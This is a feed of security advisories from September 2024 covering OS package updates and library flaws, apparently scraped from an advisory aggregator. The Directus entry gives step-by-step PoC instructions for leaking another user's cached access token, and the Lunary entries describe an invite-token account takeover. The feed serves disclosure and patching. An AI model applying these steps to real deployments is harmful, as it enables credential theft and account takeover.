Iwashima) - af_unix: Annotate data-races around sk->sk_state in unix_write_space() and poll(). (Kuniyuki Iwashima) - af_unix: Annotate data-race of sk->sk_state in unix_inq_len(). 
(Kuniyuki Iwashima) - ptp: Fix error message on failed pin verification (Karol Kolacinski) - net/sched: taprio: always validate TCA_TAPRIO_ATTR_PRIOMAP (Eric Dumazet) - tcp: count CLOSE-WAIT sockets for TCP_MIB_CURRESTAB (Jason Xing) - net: sched: sch_multiq: fix possible OOB write in multiq_tune() (Hangyu Hua) - ipv6: sr: block BH in seg6_output_core() and seg6_input_core() (Eric Dumazet) - wifi: iwlwifi: mvm: don't read past the mfuart notifcation (Emmanuel Grumbach) - wifi: iwlwifi: dbg_ini: move iwl_dbg_tlv_free outside of debugfs ifdef (Shahar S Matityahu) - wifi: iwlwifi: mvm: revert gen2 TX A-MPDU size to 64 (Johannes Berg) - wifi: cfg80211: pmsr: use correct nla_get_uX functions (Lin Ma) - wifi: mac80211: Fix deadlock in ieee80211_sta_ps_deliver_wakeup() (Remi Pommarel) - wifi: mac80211: mesh: Fix leak of mesh_preq_queue objects (Nicolas Escande)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-12612
11.09.2024 03:00:00redhat[RHSA-2024:6569] 389-ds:1.4 security update (moderate)389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration.
Security Fix(es):
* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6569
11.09.2024 00:39:25npm[NPM:GHSA-CFF8-X7JV-4FM8] Session is cached for OpenID and OAuth2 if `redirect` is not used (high)
### Summary
Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include `redirect` query string.
For example:
- Project is configured with OpenID or OAuth2
- Project is configured with cache enabled
- User tries to login via SSO link, but without `redirect` query string
- After successful login, credentials are cached
- If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user
The SSO link is something like `https://directus.example.com/auth/login/openid/callback`, where `openid` is the name of the OpenID provider configured in Directus
### Details
This happens because on that endpoint for both OpenId and Oauth2 Directus is using the `respond` middleware, which by default will try to cache GET requests that meet some conditions. However, those conditions do not exclude this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459
And for OAuth2 can be seen here: https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428
### PoC
- Create a new Directus project
- Set `CACHE_ENABLED` to true
- Set `CACHE_STORE` to `redis` for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)
- Configure `REDIS` with redis string or redis host, port, user, etc.
- Set `AUTH_PROVIDERS` to `openid`
- Set `PUBLIC_URL` to the main URL of your project. For example, `PUBLIC_URL: http://localhost:8055`
- Configure `AUTH_OPENID_CLIENT_ID`, `AUTH_OPENID_CLIENT_SECRET`, `AUTH_OPENID_ISSUER_URL` with proper OpenID configurations
- Be sure that on OpenID external app you have configured Redirect URI to `http://localhost:8055/auth/login/openid/callback`
- Run Directus
- Open the SSO link like `http://localhost:8055/auth/login/openid/callback`
- Do the authentication on the OpenID external webpage
- Verify that you got redirected to a page with a JSON including `access_token` property
- Be sure all anonymous mode windows are closed
- Open an anonymous window and go to the SSO Link `http://localhost:8055/auth/login/openid/callback` and see you have the same credentials, even though you don't have any session because you are in anonymous mode
### Impact
All projects using OpenID or OAuth 2 that do not include `redirect` query string when logging in users.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CFF8-X7JV-4FM8
10.09.2024 22:42:42npm[NPM:GHSA-M6FV-JMCG-4JFG] send vulnerable to template injection that can lead to XSS (moderate)
### Impact
passing untrusted user input - even after sanitizing it - to `SendStream.redirect()` may execute untrusted code
### Patches
this issue is patched in send 0.19.0
### Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can work around this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
### Details
successful exploitation of this vector requires the following:
1. The attacker MUST control the input to response.redirect()
2. express MUST NOT redirect before the template appears
3. the browser MUST NOT complete redirection before:
4. the user MUST click on the link in the template
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M6FV-JMCG-4JFG
10.09.2024 22:42:34npm[NPM:GHSA-CM22-4G7W-348P] serve-static vulnerable to template injection that can lead to XSS (moderate)
### Impact
passing untrusted user input - even after sanitizing it - to `redirect()` may execute untrusted code
### Patches
this issue is patched in serve-static 1.16.0
### Workarounds
users are encouraged to upgrade to the patched version of express, but otherwise can work around this issue by making sure any untrusted inputs are safe, ideally by validating them against an explicit allowlist
### Details
successful exploitation of this vector requires the following:
1. The attacker MUST control the input to response.redirect()
2. express MUST NOT redirect before the template appears
3. the browser MUST NOT complete redirection before:
4. the user MUST click on the link in the template
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CM22-4G7W-348P
11.09.2024 12:48:11almalinux[ALSA-2024:6529] dovecot security update (moderate)dovecot security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6529
13.09.2024 04:55:53fedora[FEDORA-2024-f7f36c20a2] Fedora 40: python3.11This is a security release of Python 3.11
Note: The release you're looking at is Python 3.11.10, a security bugfix release for the legacy 3.11 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f7f36c20a2
13.09.2024 04:55:49fedora[FEDORA-2024-39913e097a] Fedora 40: haproxyUpdate to 2.9.10 (CVE-2024-45506)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-39913e097a
13.09.2024 04:54:15fedora[FEDORA-2024-b11026f492] Fedora 40: oscNew upstream release 1.9.1, fixes CVE-2024-22034https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b11026f492
13.09.2024 04:36:46fedora[FEDORA-2024-18d9a6ba14] Fedora 39: oscNew upstream release 1.9.1, fixes CVE-2024-22034https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-18d9a6ba14
12.09.2024 04:35:02fedora[FEDORA-2024-055adf8e6f] Fedora 39: vimSecurity fix for CVE-2024-45306
patchlevel 703
Security fixes for CVE-2024-43374, CVE-2024-43802https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-055adf8e6f
12.09.2024 04:35:01fedora[FEDORA-2024-bdac6de5ee] Fedora 39: nextcloud29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bdac6de5ee
12.09.2024 04:35:00fedora[FEDORA-2024-b73e44fe9d] Fedora 39: wolfsslRHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 releasehttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b73e44fe9d
12.09.2024 04:28:50fedora[FEDORA-2024-02027448d8] Fedora 40: python3.6Security fix for CVE-2024-6232 (rhbz#2310092)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-02027448d8
12.09.2024 04:28:49fedora[FEDORA-2024-f750328c3b] Fedora 40: python3.10This is a security release of Python 3.10
Note: The release you're looking at is Python 3.10.15, a security bugfix release for the legacy 3.10 series. Python 3.12 is now the latest feature release series of Python 3.
Security content in this release
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of <_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash.
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f750328c3b
12.09.2024 04:28:47fedora[FEDORA-2024-e887a10dee] Fedora 40: python3.13Python 3.13.0rc2https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e887a10dee
12.09.2024 04:28:44fedora[FEDORA-2024-296a0db958] Fedora 40: nextcloud29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-296a0db958
12.09.2024 04:28:43fedora[FEDORA-2024-ed1a50aa61] Fedora 40: wolfsslRHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 releasehttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ed1a50aa61
11.09.2024 19:23:42ubuntu[USN-6997-2] LibTIFF vulnerability (high)LibTIFF could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6997-2
11.09.2024 20:31:07maven[MAVEN:GHSA-8259-2X72-2GVC] Eclipse Dataspace Components's ConsumerPullTransferTokenValidationApiController doesn't check for token validit (moderate)In Eclipse Dataspace Components, from version 0.5.0 and before version 0.9.0, the ConsumerPullTransferTokenValidationApiController does not check for token validity (expiry, not-before, issuance date), which can allow an attacker to bypass the check for token expiration. The issue requires having a dataplane configured to support http proxy consumer pull AND including the module "transfer-data-plane". The affected code was marked deprecated from version 0.6.0 in favour of Dataplane Signaling. In 0.9.0 the vulnerable code has been removed.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8259-2X72-2GVC
11.09.2024 20:30:49maven[MAVEN:GHSA-7GQ2-VWQ9-W8VW] Eclipse Glassfish URL redirection vulnerability (moderate)In Eclipse Glassfish versions prior to 7.0.10, a URL redirection vulnerability to untrusted sites existed.This vulnerability is caused by the vulnerability (CVE-2023-41080) in the Apache code included in GlassFish.This vulnerability only affects applications that are explicitly deployed to the root context ('/').https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7GQ2-VWQ9-W8VW
12.09.2024 03:00:00freebsd[FREEBSD:BCC8B21E-7122-11EF-BECE-2CF05DA270F3] Gitlab -- vulnerabilitiesGitlab reports:
- Execute environment stop actions as the owner of the stop action job
- Prevent code injection in Product Analytics funnels YAML
- SSRF via Dependency Proxy
- Denial of Service via sending a large glm_source parameter
- CI_JOB_TOKEN can be used to obtain GitLab session token
- Variables from settings are not overwritten by PEP if a template is included
- Guests can disclose the full source code of projects using custom group-level templates
- IdentitiesController allows linking of arbitrary unclaimed provider identities
- Open redirect in repo/tree/:id endpoint can lead to account takeover through broken OAuth flow
- Open redirect in release permanent links can lead to account takeover through broken OAuth flow
- Guest user with Admin group member permission can edit custom role to gain other permissions
- Exposure of protected and masked CI/CD variables by abusing on-demand DAST
- Credentials disclosed when repository mirroring fails
- Commit information visible through release atom endpoint for guest users
- Dependency Proxy Credentials are Logged in Plaintext in graphql Logs
- User Application can spoof the redirect url
- Group Developers can view group runners information
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:BCC8B21E-7122-11EF-BECE-2CF05DA270F3
14.09.2024 05:02:05fedora[FEDORA-2024-0a4a65f805] Fedora 40: chromium (high)update to 128.0.6613.137 * High CVE-2024-8636: Heap buffer overflow in Skia * High CVE-2024-8637: Use after free in Media Router * High CVE-2024-8638: Type Confusion in V8 * High CVE-2024-8639: Use after free in Autofillhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0a4a65f805
14.09.2024 05:01:59fedora[FEDORA-2024-1d0cb3b43f] Fedora 40: python3.12, python3-docs (high)This is the sixth maintenance release of Python 3.12
Python 3.12 is the newest major release of the Python programming language, and it contains many new features and optimizations. 3.12.6 is the latest maintenance release, containing about 90 bugfixes, build improvements and documentation changes since 3.12.5. This is an expedited release to address the following security issues:
gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d0cb3b43f
14.09.2024 05:01:22fedora[FEDORA-2024-c7b547bec5] Fedora 40: mingw-expat (critical)Update to expat-2.6.3.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c7b547bec5
14.09.2024 05:01:21fedora[FEDORA-2024-e8f7a74693] Fedora 40: clamav (high)Update to 1.0.7
CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.
CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parser that could cause a denial-of-service (DoS) condition.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e8f7a74693
14.09.2024 04:26:42fedora[FEDORA-2024-e77ad5f585] Fedora 39: thunderbirdUpdate to 115.15.0
https://www.thunderbird.net/en-US/thunderbird/115.15.0esr/releasenotes/
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e77ad5f585
14.09.2024 04:26:36fedora[FEDORA-2024-e86a48cd72] Fedora 39: mingw-expat (critical)Update to expat-2.6.3.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e86a48cd72
14.09.2024 04:26:31fedora[FEDORA-2024-318343049c] Fedora 39: apr (medium)This update to the apr package fixes a security issue in the handling of shared memory permissions. SECURITY: CVE-2023-49582: Apache Portable Runtime (APR): Unexpected lax shared memory permissions (cve.mitre.org) Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-318343049c
14.09.2024 00:05:31fedora[FEDORA-2024-55a5adeec4] Fedora 41: firefoxPipeWire camera support: backport set of upstream patches
New upstream update (130.0)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-55a5adeec4
14.09.2024 00:05:08fedora[FEDORA-2024-9a87127dd0] Fedora 41: mbedtls3.6 (medium)Update to 3.6.1
Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-3.6.1
Update to 3.6.0
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9a87127dd0
14.09.2024 00:03:14fedora[FEDORA-2024-9c7bbee0f0] Fedora 41: libcoap (high)Update to 4.3.5 GAhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c7bbee0f0
14.09.2024 00:03:10fedora[FEDORA-2024-e109b67926] Fedora 41: chromium (high)update to 128.0.6613.119
High CVE-2024-8362: Use after free in WebAudio
High CVE-2024-7970: Out of bounds write in V8
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e109b67926
14.09.2024 00:03:09fedora[FEDORA-2024-48e080c52f] Fedora 41: vim (medium)Security fix for CVE-2024-45306
patchlevel 703
Security fixes for CVE-2024-43374, CVE-2024-43802https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-48e080c52f
14.09.2024 00:03:02fedora[FEDORA-2024-cfcd6258fa] Fedora 41: ruby (medium)Upgrade to Ruby 3.3.5.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cfcd6258fa
14.09.2024 00:02:48fedora[FEDORA-2024-48fd84da22] Fedora 41: mingw-python3Backport patch for CVE-2024-8088https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-48fd84da22
14.09.2024 00:02:46fedora[FEDORA-2024-194cb0840b] Fedora 41: thunderbirdUpdate to 128.2.0
https://www.thunderbird.net/en-US/thunderbird/128.2.0esr/releasenotes/
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-194cb0840b
14.09.2024 00:02:44fedora[FEDORA-2024-c5d55d5845] Fedora 41: mingw-expat (critical)Update to expat-2.6.3.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c5d55d5845
14.09.2024 00:02:43fedora[FEDORA-2024-0d7eb64d90] Fedora 41: clamav (high)Update to 1.0.7
CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.
CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parser that could cause a denial-of-service (DoS) condition.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0d7eb64d90
14.09.2024 00:02:25fedora[FEDORA-2024-396c94f0a3] Fedora 41: python-djangourlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-396c94f0a3
14.09.2024 00:02:20fedora[FEDORA-2024-bd2368f66a] Fedora 41: haproxy (high)Update to 3.0.4 (CVE-2024-45506, #2309472)https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-bd2368f66a
14.09.2024 00:02:18fedora[FEDORA-2024-b08735561c] Fedora 41: python-django4.2urlize and urlizetrunc were subject to a potential denial-of-service attack via very large inputs with a specific sequence of characters.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b08735561c
14.09.2024 00:01:24fedora[FEDORA-2024-3d2a146701] Fedora 41: oscNew upstream release 1.9.1, fixes CVE-2024-22034https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d2a146701
14.09.2024 00:01:13fedora[FEDORA-2024-d4bcb0da46] Fedora 41: mbedtls (medium)Update to 2.28.9
Release notes: https://github.com/Mbed-TLS/mbedtls/releases/tag/mbedtls-2.28.9
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d4bcb0da46
14.09.2024 00:01:11fedora[FEDORA-2024-19e63ed69e] Fedora 41: nextcloud (high)29.0.6 release RHBZ#2305125 RHBZ#2309499 fixes CVE-2024-39338https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-19e63ed69e
14.09.2024 00:01:10fedora[FEDORA-2024-e089551039] Fedora 41: wolfssl (high)RHBZ#2308628 RHBZ#2308629 RHBZ#2308630 RHBZ#2308631 fixed in 5.7.2 releasehttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e089551039
14.09.2024 00:00:31fedora[FEDORA-2024-90f1d7e116] Fedora 41: seamonkeyUpdate to 2.53.19https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-90f1d7e116
13.09.2024 23:59:26fedora[FEDORA-2024-67a38b081a] Fedora 41: microcode_ctl (high)Update to upstream 2.1-44. 20240813
Update of 06-55-07/0xbf (CLX-SP/W/X B1/L1) microcode from revision 0x5003605 up to 0x5003707;
Update of 06-55-0b/0xbf (CPX-SP A1) microcode from revision 0x7002802 up to 0x7002904;
Update of 06-6a-06/0x87 (ICX-SP D0) microcode from revision 0xd0003d1 up to 0xd0003e7;
Update of 06-6c-01/0x10 (ICL-D B0) microcode from revision 0x1000290 up to 0x10002b0;
Update of 06-7e-05/0x80 (ICL-U/Y D1) microcode from revision 0xc4 up to 0xc6;
Update of 06-8c-01/0x80 (TGL-UP3/UP4 B1) microcode from revision 0xb6 up to 0xb8;
Update of 06-8c-02/0xc2 (TGL-R C0) microcode from revision 0x36 up to 0x38;
Update of 06-8d-01/0xc2 (TGL-H R0) microcode from revision 0x50 up to 0x52;
Update of 06-8e-09/0x10 (AML-Y 2+2 H0) microcode from revision 0xf4 up to 0xf6;
Update of 06-8e-09/0xc0 (KBL-U/U 2+3e/Y H0/J1) microcode from revision 0xf4 up to 0xf6;
Update of 06-8e-0a/0xc0 (CFL-U 4+3e D0, KBL-R Y0) microcode from revision 0xf4 up to 0xf6;
Update of 06-8e-0b/0xd0 (WHL-U W0) microcode from revision 0xf4 up to 0xf6;
Update of 06-8e-0c/0x94 (AML-Y 4+2 V0, CML-U 4+2 V0, WHL-U V0) microcode from revision 0xfa up to 0xfc;
Update of 06-96-01/0x01 (EHL B1) microcode from revision 0x19 up to 0x1a;
Update of 06-9e-0a/0x22 (CFL-H/S/Xeon E U0) microcode from revision 0xf6 up to 0xf8;
Update of 06-9e-0b/0x02 (CFL-E/H/S B0) microcode from revision 0xf4 up to 0xf6;
Update of 06-9e-0c/0x22 (CFL-H/S/Xeon E P0) microcode from revision 0xf6 up to 0xf8;
Update of 06-9e-0d/0x22 (CFL-H/S/Xeon E R0) microcode from revision 0xfc up to 0x100;
Update of 06-a5-02/0x20 (CML-H R1) microcode from revision 0xfa up to 0xfc;
Update of 06-a5-03/0x22 (CML-S 6+2 G1) microcode from revision 0xfa up to 0xfc;
Update of 06-a5-05/0x22 (CML-S 10+2 Q0) microcode from revision 0xfa up to 0xfc;
Update of 06-a6-00/0x80 (CML-U 6+2 A0) microcode from revision 0xfa up to 0xfe;
Update of 06-a6-01/0x80 (CML-U 6+2 v2 K1) microcode from revision 0xfa up to 0xfc;
Update of 06-a7-01/0x02 (RKL-S B0) microcode from revision 0x5e up to 0x62;
Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1c up to 0x1e.
Addresses CVE-2024-24853, CVE-2024-24980, CVE-2024-25939https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-67a38b081a
13.09.2024 23:59:08 | fedora | [FEDORA-2024-f831fe4030] Fedora 41: apr | Update APR to version 1.7.5. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f831fe4030
13.09.2024 23:58:57 | fedora | [FEDORA-2024-8142adb4a8] Fedora 41: python3.11 | Security fix for CVE-2024-8088 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8142adb4a8
13.09.2024 23:58:56 | fedora | [FEDORA-2024-b673d8c70f] Fedora 41: python3.12 | Security fix for CVE-2024-8088 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b673d8c70f
13.09.2024 23:58:54 | fedora | [FEDORA-2024-6140989aaf] Fedora 41: python3.9 | Security fix for CVE-2024-8088 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6140989aaf
13.09.2024 22:34:17 | npm | [NPM:GHSA-9JMP-J63G-8X6M] Lunary information disclosure vulnerability (moderate) | An information disclosure vulnerability exists in lunary-ai/lunary, specifically in the `runs/{run_id}/related` endpoint. This endpoint does not verify that the user has the necessary access rights to the run(s) they are accessing. As a result, it returns not only the specified run but also all runs that have the `run_id` listed as their parent run. This issue affects the main branch, commit a761d833. The vulnerability allows unauthorized users to obtain information about non-public runs and their related runs, given the `run_id` of a public or non-public run. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9JMP-J63G-8X6M
13.09.2024 22:34:11 | npm | [NPM:GHSA-V6X6-4V4X-2FX9] Lunary Cross-Site Request Forgery (CSRF) vulnerability (moderate) | A Cross-Site Request Forgery (CSRF) vulnerability exists in lunary-ai/lunary version 1.2.34 due to overly permissive CORS settings. This vulnerability allows an attacker to sign up for and create projects or use the instance as if they were a user with local access. The main attack vector is for instances hosted locally on personal machines, which are not publicly accessible. The CORS settings in the backend permit all origins, exposing unauthenticated endpoints to CSRF attacks. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-V6X6-4V4X-2FX9
13.09.2024 22:29:16 | npm | [NPM:GHSA-W73R-8MM4-CFVF] Lunary Improper Authentication vulnerability (moderate) | A broken access control vulnerability exists prior to commit 1f043d8798ad87346dfe378eea723bff78ad7433 of lunary-ai/lunary. The `saml.ts` file allows a user from one organization to update the Identity Provider (IDP) settings and view the SSO metadata of another organization. This vulnerability can lead to unauthorized access and potential account takeover if the email of a user in the target organization is known. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W73R-8MM4-CFVF
13.09.2024 22:29:13 | npm | [NPM:GHSA-6P2Q-8QFQ-WQ7X] Lunary improper access control vulnerability (moderate) | An improper access control vulnerability exists in lunary-ai/lunary prior to commit 844e8855c7a713dc7371766dba4125de4007b1cf on the main branch. The vulnerability allows an attacker to use the auth tokens issued by the 'invite user' functionality to obtain valid JWT tokens. These tokens can be used to compromise target users upon registration for their own arbitrary organizations. The attacker can invite a target email, obtain a one-time use token, retract the invite, and later use the token to reset the password of the target user, leading to full account takeover. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6P2Q-8QFQ-WQ7X
13.09.2024 16:48:06 | suse | [SUSE-SU-2024:3080-2] Security update for curl (moderate) | Security update for curl | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3080-2
13.09.2024 14:47:02 | ubuntu | [USN-7009-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7009-1
13.09.2024 14:22:12 | ubuntu | [USN-7005-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7005-2
13.09.2024 13:51:48 | ubuntu | [USN-7008-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7008-1
13.09.2024 12:38:11 | ubuntu | [USN-7007-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7007-1
13.09.2024 11:01:57 | ubuntu | [USN-7003-3] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-3
13.09.2024 22:32:24 | maven | [MAVEN:GHSA-CX7F-G6MP-7HQM] Path traversal vulnerability in functional web frameworks (high) | Applications serving static resources through the functional web frameworks WebMvc.fn or WebFlux.fn are vulnerable to path traversal attacks. An attacker can craft malicious HTTP requests and obtain any file on the file system that is also accessible to the process in which the Spring application is running. Specifically, an application is vulnerable when both of the following are true: * the web application uses RouterFunctions to serve static resources * resource handling is explicitly configured with a FileSystemResource location. However, malicious requests are blocked and rejected when any of the following is true: * the Spring Security HTTP Firewall (https://docs.spring.io/spring-security/reference/servlet/exploits/firewall.html) is in use * the application runs on Tomcat or Jetty | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CX7F-G6MP-7HQM
